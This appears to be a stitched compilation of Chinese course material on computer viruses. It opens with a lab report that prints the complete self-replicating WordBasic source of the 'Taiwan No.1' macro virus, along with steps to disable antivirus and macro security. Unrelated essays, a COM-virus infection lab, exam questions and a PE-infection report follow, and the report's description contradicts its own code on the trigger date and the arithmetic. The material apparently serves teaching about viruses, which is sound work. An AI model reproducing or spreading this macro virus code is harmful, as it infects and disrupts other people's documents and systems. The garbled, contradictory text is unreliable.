计算机病毒原理-台湾1号病毒实验报告

计算机病毒原理-台湾1号病毒实验报告
计算机病毒原理-台湾1号病毒实验报告

计算机病毒

实验报告

姓名:

学号:

老师:

日期:

一. 实验目的

台湾1号病毒是一种破坏力较大的宏病毒!Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。本实验演示了宏的编写,通过台湾1号病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。

二. 实验内容

1. macro virus中的内容

2.计算机病毒篇 ---->计算机宏病毒

三. 实验环境

1. macro virus

硬件设备:局域网,终端PC机。

系统软件:Windows系列操作系统

支撑软件:Word 2003

软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问.

实验环境配置如下图所示:

受感染终端

受感染Word 文档

被感染终端

2.计算机宏病毒

硬件设备:部署 WIN2003 系统的PC 机一台 软件工具:Office word2007

四.实验步骤及截图

台湾1号病毒代码

Taiwan No.1 病毒原始码

Dim Shared nm(4)

Sub MAIN

DisableInput 1

If Day(Now()) = 13 Then

try:

On Error Goto 0

On Error Goto try

test = - 1

con = 1

tog$ = ""

i = 0

While test = - 1

For i = 0 To 4

nm(i) = Int(Rnd() * 10000)

con = (con * nm(i))

If i = 4 Then

tog$ = tog$ + Str$(nm(4)) + " =?"

Goto beg

End If

tog$ = tog$ + Str$(nm(i)) + " *"

Next i

rem 随机选出四个千位数, 以便等一下的游戏

Beep

rem 电脑发出" 哔"一声

ans$ = InputBox$("今天是" + Date$() + " ,跟你玩一个心算游戏" + Chr$(13) + /

"若你答错,只好接受震撼教育.............." + Chr$(13) + /

tog$, "台湾NO.1 Macro Virus")

rem 开个对话盒, 以便输入解答用

If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then

MsgBox "恭贺你答对了,按确定就告诉你想知道的....", /

"台湾NO.1 Macro Virus"

FileNewDefault

CenterPara

FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Beep

Insert "何谓巨集病毒?"

InsertPara

Insert "答案:"

Italic 1

Insert "我就是....."

InsertPara

InsertPara

Italic 0

FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Beep

Insert "如何预防巨集病毒?"

InsertPara

Beep

Insert "答案:"

Italic 1

Insert "不要看我....."

Goto exit

Else

For j = 1 To 20

Beep

FileNewDefault

Next j

CenterPara

FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Insert "巨集病毒"

Goto try

End If

Wend

End If

nor = CountMacros(0)

If nor > 0 Then

For kk = 1 To nor

If MacroName$(kk, 0) = "AutoOpen" Then t = 1

End If

Next kk

End If

file$ = FileName$()

filem$ = file$ + ":AutoOpen"

If t <> 1 Then

MacroCopy filem$, "AutoOpen"

MacroCopy filem$, "AutoNew"

MacroCopy filem$, "AutoClose"

End If

nor1 = CountMacros(1)

If nor1 > 0 Then

For kkk = 1 To nor1

If MacroName$(kkk, 1) = "AutoOpen" Then tt = 1

End If

Next kkk

End If

If tt <> 1 Then

FileSaveAs .Format = 1

MacroCopy "AutoOpen", filem$

End If

exit:

End Sub

该病毒的效果如下:当打开被感染的word文档时,首先进行自我复制,感染word模板,然后检查日期,看是否是1日(即在每月的1日会发作),然后跳出一个对话框,要求用户进行一次心算游戏,这里只用四个小于10的数相乘,如果作者的计算正确,那么就会新建一个文档,跳出如下字幕:

何谓宏病毒

答案:我就是......

将系统日期设为XX月1号

如果答错,就会不停地刷屏,然后继续让你答题,否则跳出如下界面:

计算机宏病毒

1). 新建Word 文档并打开

2). 调出开发工具,设置宏的等级,启用宏

3). 创建宏,命名AutoExec 编辑

4). 编辑宏,语法上注意VBA 版本保存

5). 关闭所有Word(必须)

6). 再次打开Word 文档,宏病毒爆发,弹出刚刚编写的msgbox 窗口

7). 启动任务管理器结束进程

搜索winword.exe 文件,并确定复制其位置

8). 启用CMD,定位winword 位置:

输入命令,用参数来打开安全模式winword.exe /a(执行此命令2 次)第一次安全模式

第二次新建文档

进行宏的打开设置来禁用宏

9). 搜索normal.dotm 等模板文件,若搜索不出东西,在高级选项中选中搜索隐藏文件及系统文件即可,并删除那个文件夹下的所有模板

10). 简易摆脱宏完成,重新打开word,没有被感染。

五. 总结与心得

在使用电脑的过程中,我们要加强电脑的安全指数,要有防范意识,防止网络病毒的入侵!特别是在现代网络发达的社会,一旦被高级病毒入侵,很有可能带来重大损失!同时也应该学好病毒知识,这样,我们就可以知道如何去解决病毒问题,让我们免受损失!

引导型病毒的机理和解析

引导型病毒的机理和解析

引导型计算机病毒的机理和解析 摘要:引导型病毒是什么,其技术发展,优缺点,特点以及来源,引导型病毒的机制,解析源于DOS高级版本以及Windows 9X的新型引导型病毒的结构,并提出引导型病毒的检测和防治方法。 关键词:引导区硬盘内存新型引导型病毒病毒结构防治 计算机病毒是指在计算机程序中插入的破坏计算机功能或数据,影响计算机使用并且能够自我复制的一组计算机指令或程序代码。计算机病毒具有3个基本特性:感染性、潜伏性和表现性。换句话来说计算机病毒是人为的特制程序或指令程序,具有自我复制能力,并有一定的潜伏性、特定的触发性和很大的破坏性。 计算机病毒的种类繁多,按感染方式分为:引导型病毒、文件感染病毒和混合型病毒。引导型病毒感染硬盘主引导扇区或引导扇区以及软盘的引导扇区,如大麻、火炬、BREAK等病毒。 1 引导型病毒 1.1 简介 引导型病毒寄生在主引导区、引导区,病毒利用操作系统的引导模块放在某个固定的位置,并且控制权的转交方式是以物理位置为依

据,而不是以引导型病毒寄生在主引导区、引导区,病毒利用操作系统的引导模块放在某个固定的位置,并且控制权的转交方式是以物理位置为依据,而不是以操作系统引导区的内容为依据,因而病毒占据该物理位置即可获得控制权,而将真正的引导区内容搬家转移,待病毒程序执行后,将控制权交给真正的引导区内容,使得这个带病毒的系统看似正常运转,而病毒已隐藏在系统中并伺机传染、发作。 引导型病毒进入系统,一定要通过启动过程。在无病毒环境下使用的软盘或硬盘,即使它已感染引导区病毒,也不会进入系统并进行传染,但是,只要用感染引导区病毒的磁盘引导系统,就会使病毒程序进入内存,形成病毒环境。 1.2 计算机启动过程 在分析引导型病毒之前,必须清楚正常的系统启动过程。上电或复位后,ROM_BIOS的初始化程序完成相应的硬件诊断,并设置

计算机病毒原理及防范技术(精简版)

《计算机病毒原理及防范技术》----秦志光张凤荔刘峭著 43.8万字 第1章计算机病毒概述 1.1.1计算机病毒的起源----第一种为科学幻想起源说,第二种为恶作剧,第三种为戏程序(70年代,贝尔实验室,Core War), 第四种为软件商保护软件起源说。 1.计算机病毒的发展历史-----第一代病毒,传统的病毒, 第二代病毒(1989-1991年),混合型病毒(或“超级病毒”),采取了自我保护措施(如加密技术,反跟踪技术);第三代病毒(1992-1995年)多态性病毒(自我变形病毒)首创者Mark Washburn-----“1260病毒”;最早的多态性的实战病毒----“黑夜复仇者”(Dark Avenger)的变种MutationDark Avenger ;1992年第一个多态性计算机病毒生成器MtE,第一个计算机病毒构造工具集(Virus Construction Sets)----“计算机病毒创建库”(Virus Create Library), ”幽灵”病毒;第四代病毒(1996-至今),使用文件传输协议(FTP)进行传播的蠕虫病毒,破坏计算机硬件的CIH,远程控制工具“后门”(Bank Orifice),”网络公共汽车”(NetBus)等。 2.计算机病毒的基本特征----1.程序性(利用计算机软、硬件所固有的弱点所编制的、具有特殊功能的程序),2、传染性,3、隐蔽性(兼容性、程序不可见性)4、潜伏性(“黑色星期五”,“上海一号”,CIH),5、破坏性,6、可触发性,7、不可预见性,8、针对性,9、非授权可执行性,10、衍生性。 1.2.2.计算机病毒在网络环境下表现的特征------1.电子邮件成主要媒介(QQ,MSN等即时通讯软件,可移动存储设备,网页,网络主动传播,网络,“钓鱼”),2.与黑客技术相融合(“Nimda”,CodeRed,”求职信”),3.采取了诸多的自我保护机制(逃避、甚至主动抑制杀毒软件),4.采用压缩技术(压缩变形----特征码改变,压缩算法,“程序捆绑器”),5.影响面广,后果严重,6.病毒编写越来越简单,7.摆脱平台依赖性的“恶意网页”。 1.2.3.计算机病毒的生命周期----1.孕育期(程序设计,传播),2.潜伏感染期,3.发病期,4.发现期,5.消化期,6.消亡期。 第2章计算机病毒的工作机制 2.1.1计算机病毒的典型组成三大模块-----1.引导模块(将病毒引入计算机内存,为传染模块和表现模块设置相应的启动条件),2.感染模块(两大功能-----1.依据引导模块设置的传染条件,做判断;2启动传染功能), 3.表现模块(两大功能----依据引导模块设置的触发条件,做判断;或者说表现条件判断子模块 2.1启动病毒,即表现功能实现子模块) 2.2.1计算机病毒的寄生方式-----1.替代法(寄生在磁盘引导扇区);2.链接法(链接在正常程序的首部、尾部、或中间)。 2.2.2.计算病毒的引导过程-----1。驻留内存,2.获得系统控制权, 3.恢复系统功能。 2.4.1.计算机病毒的触发机制----1.日期,2.时间, 3.键盘 4.感染触发, 5.启动, 6.访问磁盘次数, 7.调用中断功能触发, 8.CPU型号/主板型号触发。 第三章计算机病毒的表现 3.1.计算机病毒发作前的表现----1.经常无故死机,操作系统无法正常启动,运行速度异常, 4.内存不足的错误, 5.打印、通信及主机接口发生异常, 6.无意中要求对软盘进行写操作, 7.以前能正常运行的应用程序经常死机或者出现非法错误, 8.系统文件的时、日期和大小发生变化, 9.宏病毒的表现现象,10、磁盘空间迅速减少,11.网络驱动器卷或者共享目录无法调用,陌生人发来的电子邮件,13.自动链接到一些陌生的网站。

第一组COM病毒实验报告

COM病毒实验报告 我们小组已经成功的实现了COM病毒感染实验。 在整个实验过程中,由于是初次配置Dos环境,我们遇到了很多问题,也花了很多时间去解决问题,因此,我们在此写出我们整个配置过程的主要步骤及其遇到的问题。 一.配置MS-Dos 1. 新建一个虚拟机 2. 用虚拟机的软驱载入,安装程序的第一个镜像 DOS71_1.IMG (在安装时设备里面没有floppy时只需add一下就好,选择物理软盘驱动器) 3.此时MS-DOS虚拟机处于半安装状态,然后开始命令配置 先创建一个文件夹tmp md tmp 复制软盘A的文件到C copy A:\ C:\tmp 关机 shutdown -s 4.用虚拟机的软驱载入安装程序的第二个镜像 DOS71_2.IMG 复制软盘A的文件到C copy A:\ C:\tmp 5.开始配置 先进入到tmp文件夹下 运行setup.bat (在此运行过程中,出现死机,原因不明,最后通过重启解决此问题) 6. 然后一路next和ok完成配置 二.安装MASM611 1.下载MASM611(里面包括5个DISK) 2.在虚拟机里面通过映射到磁盘(我们所做实验为Z盘),在映射过程中,特别注意把只读属性去掉,然后把下载的MASM611拷贝到此磁盘 3.打开MS-DOS系统,进入到MASM611下的DISK1文件目录下 4.开始安装 运行命令 setup.exe 5.在安装过程中,特别注意在第二次选项时应选择MS-DOS/Microsoft

Windows,否则无法使用link链接命令 6.其它一律按默认值点击确定,安装成功 三.实验过程 1.在使用MASM611前,应在MASM611目录下进行路径的配置(这点要特别注意) 路径配置命令 set PATH=C:\DOS71;..;C:\MASM611\BIN; 2.编译链接test文件(test文件是正常文件),在此实验中,链接后需要把test.exe改为https://www.360docs.net/doc/422282811.html,文件 编译test文件时出错 unmatched block nesting:main(解决方法:在test 文件中加入一句与main匹配的代码main endp) 3.运行test文件(命令为https://www.360docs.net/doc/422282811.html,),运行成功,显示字符串:This a simple com program for a test 4.编译链接virus文件(virus文件为病毒),此时virus.exe文件已经生成 编译virus文件时出错 invalid character in file(解决方法:在相应的出错处加上分号;) 6.新建一个文件del.txt 命令 echo aaa >del.txt 7.查看MASM611下的文件目录,此时可以看到del.txt文件 8.运行virus.exe,成功后出现字符串 You are infected by a simple com virus,(但在运行该命令时,系统有时会死机,原因不明,最后解决方法,强制关掉MS-DOS系统后重新启动) 9.然后运行https://www.360docs.net/doc/422282811.html,,此时运行结果为 You are infected by a simple com virus 以及相关的乱码等等 10.此时在MASM611目录下查找刚刚新建的文件del.txt,可以发现del.txt不 见了,并且https://www.360docs.net/doc/422282811.html,文件变大 11.实验结束,病毒virus文件成功感染test文件

计算机病毒免疫原理

计算机病毒免疫原理 我们知道,计算机病毒的传染模块一般包括传染条件判断和实施传染两个部分,在病毒被激活的状态下,病毒程序通过判断传染条件的满足与否,以决定是否对目标 对象进行传染。一般情况下,病毒程序在传染完一个对象后,都要给被传染对象加上传染标识,传染条件的判断就是检测被攻击对象是否存在这种标识,若存在这种 标识,则病毒程序不对该对象进行传染;若不存在这种标示,则病毒程序就该对象实施传染。由于这种原因,人们自然会想到是否能在正常对象中加上这种标识,就 可以不受病毒的传染,起到免疫的作用呢? 从实现计算机病毒免疫的角度看病毒的传染,可以将病毒的传染分成两种。一种是像香港病毒,1575病毒这样,在传染前先检查待传染的扇区或程序里 是否含有病毒代码,如果没有找到则进行传染,如果找到了则不再进行传染。这种用作判断是否为病毒自身的病毒代码被称作传染标志,或免疫标志。第二种是在传 染时不判断是否存在免疫标志,病毒只要找到一个可传染对象就进行一次传染。就像黑色星期五那样,一个文件可能被黑色星期五反复传染多次,滚雪球一样越滚越 大(要补充一点的是,黑色星期五病毒的程序中具有判别传染标志的代码,由于程序设计错误,使判断失败,形成现在的情况,对文件会反复感染,传染标志形同虚 设)。 计算机病毒免疫的方法和缺点 下面来看看防病毒软件使用的免疫方法是如何工作的。目前常用的免疫方法有两种: 1.针对某一种病毒进行的计算机病毒免疫 例如对小球病毒,在DOS引导扇区的1FCH处填上1357H,小球病毒一检查到这个标志就不再对它进行传染了。对于1575文件型病毒,免疫标志是文件 尾的内容为0CH和0AH的两个字节,1575病毒若发现文件尾含有这两个字节,则不进行传染。这种方法的优点是可以有效地防止某一种

计算机病毒的防范的实验报告

计算机病毒的防范 随着计算机及计算机网络的发展,伴随而来的计算机病毒传播问题越来越引起人们的关注。随因特网的流行,有些计算机病毒借助网络爆发流行,如CIH计算机病毒、“爱虫”病毒等,它们与以往的计算机病毒相比具有一些新的特点,给广大计算机用户带来了极大的损失。 当计算机系统或文件染有计算机病毒时,需要检测和消除。但是,计算机病毒一旦破坏了没有副本的文件,便无法医治。隐性计算机病毒和多态性计算机病毒更使人难以检测。在与计算机病毒的对抗中,如果能采取有效的防范措施,就能使系统不染毒,或者染毒后能减少损失。 计算机病毒防范,是指通过建立合理的计算机病毒防范体系和制度,及时发现计算机病毒侵入,并采取有效的手段阻止计算机病毒的传播和破坏,恢复受影响的计算机系统和数据。 计算机病毒利用读写文件能进行感染,利用驻留内存、截取中断向量等方式能进行传染和破坏。预防计算机病毒就是要监视、跟踪系统内类似的操作,提供对系统的保护,最大限度地避免各种计算机病毒的传染破坏。 计算机病毒的工作方式是可以分类的,防杀计算机病毒软件就是针对已归纳总结出的这几类计算机病毒工作方式来进行防范的。当被分析过的已知计算机病毒出现时,由于其工作方式早已被记录在案,防杀计算机病毒软件能识别出来;当未曾被分析过的计算机病毒出现时,如果其工作方式仍可被归入已知的工作方式,则这种计算机病毒能被反病毒软件所捕获。这也就是采取积极防御措施的计算机病毒防范方法优越于传统方法的地方。 计算机病毒防范工作,首先是防范体系的建设和制度的建立。没有一个完善的防范体系,一切防范措施都将滞后于计算机病毒的危害。 计算机病毒防范体系的建设是一个社会性的工作,不是一两个人、一两家企业能够实现的,需要全社会的参与,充分利用所有能够利用的资源,形成广泛的、全社会的计算机病毒防范体系网络。 一.计算机病毒的技术预防措施 下面总结出一系列行之有效的措施供参考。 1、新购置的计算机硬软件系统的测试 新购置的计算机是有可能携带计算机病毒的。因此,在条件许可的情况下,要用检测计算机病毒软件检查已知计算机病毒,用人工检测方法检查未知计算机病毒,并经过证实没有计算机病毒感染和破坏迹象后再使用。

局域网病毒入侵原理及防范方法

计算机病毒在网络中泛滥已久,而其在局域网中也能快速繁殖,导致局域网计算机的相互感染,使整个公司网络瘫痪无法正常运做,其损失是无法估计的。 一、局域网病毒入侵原理及现象 一般来说,计算机网络的基本构成包括网络服务器和网络节点站(包括有盘工作站、无盘工作站和远程工作站)。计算机病毒一般首先通过各种途径进入到有盘工作站,也就进入网络,然后开始在网上的传播。具体地说,其传播方式有以下几种。 (1)病毒直接从工作站拷贝到服务器中或通过邮件在网内传播; (2)病毒先传染工作站,在工作站内存驻留,等运行网络盘内程序时再传染给服务器; (3)病毒先传染工作站,在工作站内存驻留,在病毒运行时直接通过映像路径传染到服务器中 (4)如果远程工作站被病毒侵入,病毒也可以通过数据交换进入网络服务器中一旦病毒进入文件服务器,就可通过它迅速传染到整个网络的每一个计算机上。而对于无盘工作站来说,由于其并非真的"无盘"(它的盘是网络盘),当其运行网络盘上的一个带毒程序时,便将内存中的病毒传染给该程序或通过映像路径传染到服务器的其他的文件上,因此无盘工作站也是病毒孽生的温床。

由以上病毒在网络上的传播方式可见,在网络环境下,网络病毒除了具有可传播性、可执行性、破坏性等计算机病毒的共性外,还具有一些新的特点。 (1)感染速度快 在单机环境下,病毒只能通过介质从一台计算机带到另一台,而在网络中则可以通过网络通讯机制进行迅速扩散。根据测定,在网络正常工作情况下,只要有一台工作站有病毒,就可在几十分钟内将网上的数百台计算机全部感染。 (2)扩散面广 由于病毒在网络中扩散非常快,扩散范围很大,不但能迅速传染局域网内所有计算机,还能通过远程工作站将病毒在一瞬间传播到千里之外。 (3)传播的形式复杂多样 计算机病毒在网络上一般是通过"工作站"到"服务器"到"工作站"的途径进 行传播的,但现在病毒技术进步了不少,传播的形式复杂多样。 (4)难于彻底清除e. 单机上的计算机病毒有时可以通过带毒文件来解决。低级格式化硬盘等措施能将病毒彻底清除。而网络中只要有一台工作站未能清除干净,就可使整个网络重新被病毒感染,甚至刚刚完成杀毒工作的一台工作站,就有可能被网上另一台带毒工作站所感染。因此,仅对工作站进行杀毒,并不能解决病毒对网络的危害。

计算机病毒简答题.docx

计算机病毒简答题 一、名词解释 1、计算机病毒:编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。 2、特洛伊木马:是一种与远程计算机之间建立起连接,使远程计算机能够通过网络控制用户计算机系统并且可能造成用户的信息损失、系统损坏甚至瘫痪的程序。 3、Word宏病毒:是一些制作病毒的专业人员利用Microsoft Word的开放性专门制作的一个或多个具有病毒特点的宏的集合,这种病毒宏的集合影响到计算机的使用,并能通过DOC文档及DOT模板进行自我复制及传播。 4、手机病毒:以手机为感染对象,以手机网络和计算机网络为平台,通过病毒短信等形式,对手机进行攻击,从而造成手机异常的一种新型病毒。 5、蠕虫:是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如传播性、隐蔽性和破坏性等,同时蠕虫还具有自己特有的一些特征,如不利用文件寄生(有的只存在于内存中),对网络造成拒绝服务,以及和黑客技术相结合等。 6、流氓软件:是介于病毒和正规软件之间,同时具备正常功能(下载、媒体播放等)和恶意行为(弹广告、开后门)的软件,给用户带来实质危害。 7、僵尸网络:是指控制者采用一种或多种传播手段,将Bot程序(僵尸程序)传播给大批计算机,从而在控制者和被感染计算机之间所形成的一个可一对多控制的网络。

8、计算机病毒的预防技术:是指通过一定的技术手段防止计算机病毒对系统进行传染和破坏,实际上它是一种预先的特征判定技术。 9、网络钓鱼:利用欺骗性的电子邮件和伪造的Web站点进行诈骗活动,受骗者往往会泄露自己的重要数据,如信用卡号、账户用户名、口令和社保编号等内容。 10、计算机病毒抗分析技术:是针对病毒的分析技术提出的,目的是使病毒分析者难以分析清楚病毒原理,主要有加密技术、反跟踪技术等。 二、简答题 1、根据计算机病毒的发展趋势和最新动向,你认为现有哪些病毒代表了 这些趋势? 答:计算机病毒的发展趋与计算机技术的发展相关。根据近期病毒的特征,可以看出新世纪纪电脑病毒具有以下新特点:网络化、专业化、智能化、人性化、隐蔽化、多样化和自动化。一些蠕虫病毒、木马病毒、恶意程序等代表了这些趋势。 2、计算机病毒包含四大功能模块,并且在系统中病毒表现为静态和动态两个状态,请叙述四大功能模块之间的关系,以及状态的转换过程。 答:计算机病毒一般由感染模块、触发模块、破坏模块(表现模块)和引导模块(主控模块)四大部分组成。根据是否被加载到内存,计算机病毒又分为静态和动态。处于静态的病毒存于存储介质中,一般不能执行感染和破坏功能,其传播只能借助第三方活动(例如:复制、下载和邮件传输等)实现。当病毒经过引导功能开始进入内存后,便处于活动状态(动态),满足一定触发条件后就开始进行传染和破坏,从而构成对计算机系统和资源的威胁和毁坏。 3、请简述木马和远程控制程序之间的关系。

计算机病毒实验报告

计算机病毒实验报告 ——windows病毒实验 姓名:张艳秋 学号:081300607 班级:信安0802 指导老师:韦俊银 实验日期:2011.5.27

实验内容 1.PE文件感染实验(选) 2.暴风一号病毒 3.VBS病毒产生 4.宏病毒实验(选)

PE文件感染实验 实验目的 了解pe病毒的感染过程 实验环境 硬件设备 PC机一台(建议虚拟机) 软件工具 Office Word 2007 实验步骤 一:参照病毒感染PE文件的7个步骤,记录病毒是如何感染文件(文字和截屏形式) 病毒感染文件过程(以感染文件ebookcode.exe为例): 重定位,获得所有API地址: …… 通过软件Stud_PE可查看可执行文件ebookcode.exe的结构可查看文件内容: 1.判断目标文件开始的两个字节是否为“MZ”:

2.判断PE文件标记“PE”: 3.判断感染标记,如果已被感染过则跳出继续执行宿主程序,否则继续: 4.读取IMAGE_FILE_HEADER的NumberOfSections域,获得Data Directory (数据目录)的个数,(每个数据目录信息占8个字节): 5.得到节表起始位置。(数据目录的偏移地址+数据目录占用的字节数=节表起始位置):

6.得到节表的末尾偏移(紧接其后用于写入一个新的病毒节信息)节表起始位置+节的个数*(每个节表占用的字节数28H)=节表的末尾偏移 7.开始写入节表,感染文件: 二:在掌握Stud_PE工具的基础上,比较文件感染前后有哪些变化。 感染前:

感染后: 由上两图可以看出,感染前后有4处发生了变化: 1:PE文件头中入口点: 感染病毒后ebookedit.exe程序的入口点变成了病毒文件的入口点 2:PointerToRawData域值,即该文件的偏移量发生了变化; 3:imag的大小发生了变化; 4:sections的数量发生了变化。 由.exe文件感染前后变化可知,PE病毒感染过程即在文件中添加一个新节,

计算机病毒解析与防范

题目:计算机病毒解析与防范

摘要 计算机病毒被喻为21世纪计算机犯罪的五大手段之一,并排序为第二。计算机病毒的攻击性,在于它能够破坏各种程序并蔓延于应用领域。目前世界上上亿用户受着计算机病毒的困扰,有些还陷入极度的恐慌之中。事实上人们产生上述不安的原因,在与对计算机病毒的误解,广大计算机用户有必要对计算机病毒的一些知识有一个比较明确的认识和全面的科学态度。 关键词: 计算机病毒病毒的困扰病毒的误解病毒的认识

目录 1 绪论 (1) 2 计算机病毒的概述 (2) 2.1 计算机病毒的定义 (2) 2.2 计算机病毒的特性 (2) 3 计算机病毒的分类 (4) 3.1 计算机病毒的基本分类 (4) 4 计算机病毒防范和清除的基本原则和技术 (6) 4.1 计算机病毒防范的概念和原则 (6) 4.2 计算机病毒防范基本技术 (6) 4.3 清除计算机病毒的基本方法 (6) 4.4 典型计算机病毒的原理、防范和清除 (6) 5 “熊猫烧香”病毒剖析 (10) 总结 (11) 致谢 (12) 参考文献 (12)

1 绪论 入了信息社会,创造了计算机,计算机虽然给人们的工作和生活带来了便利和效率,然而计算机系统并不安全,计算机病毒就是最不安全的因素之一,它会造成资源和财富的巨大浪费,人们称计算机病毒为“21世纪最大的隐患”,目前由于计算机软件的脆弱性与互联网的开放性,我们将与病毒长期共存。因此,研究计算机病毒及防范措施技术具有重要的意义。

2 计算机病毒的概述 随着社会的不断进步,科学的不断发展,计算机病毒的种类也越来越多, 但终究万变不离其宗! 2.1 计算机病毒的定义 一般来讲,只要能够引起计算机故障,或者能够破坏计算机中的资源的 代码,统称为计算机病毒。而在我国也通过条例的形式给计算机病毒下了一 个具有法律性、权威性的定义:“计算机病毒,是指编制或者在计算机程序 中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的 一组计算机指令或者程序代码。”这就是计算机病毒。 2.2 计算机病毒的特性 2.2.1 隐藏性与潜伏性 计算机病毒是一种具有很高编程技巧、短精悍的可执行程序。它通常内 附在正常的程序中,用户启动程序同时也打开了病毒程序。计算机病毒程序 经运行取得系统控制权,可以在不到1秒钟的时间里传染几百个程序。而 且在传染操作成后,计算机系统仍能运行,被感染的程序仍能执行,这就是 计机病毒传染的隐蔽性……计算机病毒的潜伏性则是指,某些编制巧的计算 机病毒程序,进入系统之后可以在几周或者几个月甚至年内隐藏在合法文件中,对其它系统文件进行传染,而不被人发现。 2.2.2 传染性 计算机病毒可通过各种渠道(磁盘、共享目录、邮件)从已被感染的计算机扩散到其他机器上,感染其它用户.在某情况下导致计算机工作失常。 2.2.3 表现性和破坏性 任何计算机病毒都会对机器产生一定程的影响,轻者占用系统资源,导致系统运行速度大幅降低.重者除文件和数据,导致系统崩溃。 2.2.4 可触发性病毒 具有预定的触发条件,可能是时间、日期、文类型或某些特定数据等。一旦满足触发条件,便启动感染或破坏作,使病毒进行感染或攻击;如不满足,继续潜伏。有些病毒针对特定的操作系统或特定的计算机。

20112529徐文锋-计算机病毒实验报告

计算机与信息学院 《计算机病毒与反病毒》 课程作业 学生姓名:徐文锋 学号:20112529 专业班级:计算机11-3班 2014 年06 月24 日

说明 1.本课程作业报告是《计算机病毒与反病毒》课程成绩评定的重要依据,须认真完成。 2.报告内容严禁出现雷同,每位同学须独立完成。若发现抄袭,抄袭者和被抄 ............ 袭者本课程的成绩均以零分 ............计.。 3.要排版,格式应规范,截图一律采用JPG格式(非BMP格式)。为避免抄袭,用图像编辑软件在截图右下角“嵌入”自己的学号或姓名。实验报告的格式是否规范、截图是否嵌入了自己的学号或姓名,是评价报告质量的考量因素。4.说明文字与实验截图相配合,若只有说明文字,或只有截图,则成绩为不及格。 5.只提交报告电子版。在规定的日期内,通过电子邮件发送到hfutZRB@https://www.360docs.net/doc/422282811.html,,若三天之内没有收到内容为“已收到”的回复确认Email,请再次发送或电话联系任课老师。 6.为了便于归档,实验报告Word文档的命名方式是“学号姓名-计算机病毒实验报告.doc”,如“201112345张三-计算机病毒课程报告.doc”。 注意:提交报告截止日期以QQ群通知时间为准(一般在考试周下周周三),若因没有及时提交实验报告,导致课程成绩为“缺考”的,责任自负。

实验一程序的自动启动 一、实验目的 (1)验证利用注册表特殊键值自动启动程序的方法; (2)检查和熟悉杀毒软件各组成部分的自动启动方法。 二、实验内容与要求 (1)在注册表自动加载程序主键中,添加加载目标程序键值(自己指派任意程序),重启操作系统,检查是否能自动成功加载目标程序。罗列5或5个以上能自动启动目标程序的键值,并用其中某一个启动自己指派的程序。 (2)检查/分析你所使用的计算机中杀毒软件系统托盘程序、底层驱动程序等组成部分的自动启动方式。 三、实验环境与工具 操作系统:Windows XP/Windows Vista/Windows 7 工具软件:RegEdit.exe,AutoRuns,或其他注册表工具软件;杀毒软件四、实验步骤与实验结果 一)按启动文件夹的方法 1、“启动”文件夹是最常见的自启动文件夹。可以打开“开始”菜单—>“所有程序”,在所有程序里面可以找到“启动”文件夹 找到“启动”文件夹的位置,在其中加入WPS的word的快捷方式,就可以在电脑开机时自启动word了

《计算机病毒原理与防治》习题及解答

公共选修课《计算机病毒原理与防治》 期末题目 学院:___________________ 专业:_______________ 姓名:___________________ 学号:_______________ 一、单项选择题(2*25=50分): 1.病毒程序按其侵害对象不同分为_______C_____。 A、外壳型、入侵型、原码型和外壳型 B、原码型、外壳型、复合型和网络病毒 C、引导型、文件型、复合型和网络病毒 D、良性型、恶性型、原码型和外壳型 2.不是微机之间病毒传播的媒介的是______C______。 A、硬盘 B、鼠标 C、软盘 D、光盘 3.常见计算机病毒的特点有______D______。 A.只读性、趣味性、隐蔽性和传染性 B.良性、恶性、明显性和周期性 C.周期性、隐蔽性、复发性和良性 D.隐蔽性、潜伏性、传染性和破坏性 4.对已感染病毒的磁盘______B______。 A.用酒精消毒后可继续使用; B.用杀毒软件杀毒后可继续使用, C.可直接使用,对系统无任何影响; D.不能使用只能丢掉 5.发现计算机感染病毒后,如下操作可用来清除病毒______A______。 A.使用杀毒软件; B.扫描磁盘 C.整理磁盘碎片; D.重新启动计算机 6.防止病毒入侵计算机系统的原则是______D______。 A.对所有文件设置只读属性; B.定期对系统进行病毒检查, C.安装病毒免疫卡; D.坚持以预防为主,堵塞病毒的传播渠道 7.复合型病毒是_____D_______。 A、即感染引导扇区,又感染WORD文件 B、即感染可执行文件,又感染WORD文件, C、只感染可执行文件; D、既感染引导扇区,又感染可执行文件 8.计算机病毒的防治方针是______A______。 A.坚持以预防为主; B.发现病毒后将其清除 C.经常整理硬盘; D.经常清洗软驱 9.计算机病毒的最终目标在于_______A_____。

计算机病毒原理-台湾1号病毒实验报告

计算机病毒 实验报告 姓名: 学号: 老师: 日期:

一. 实验目的 台湾1号病毒是一种破坏力较大的宏病毒!Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。本实验演示了宏的编写,通过台湾1号病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 二. 实验内容 1. macro virus中的内容 2.计算机病毒篇 ---->计算机宏病毒 三. 实验环境 1. macro virus 硬件设备:局域网,终端PC机。 系统软件:Windows系列操作系统 支撑软件:Word 2003 软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问. 实验环境配置如下图所示:

受感染终端 受感染Word 文档 被感染终端 2.计算机宏病毒 硬件设备:部署 WIN2003 系统的PC 机一台 软件工具:Office word2007

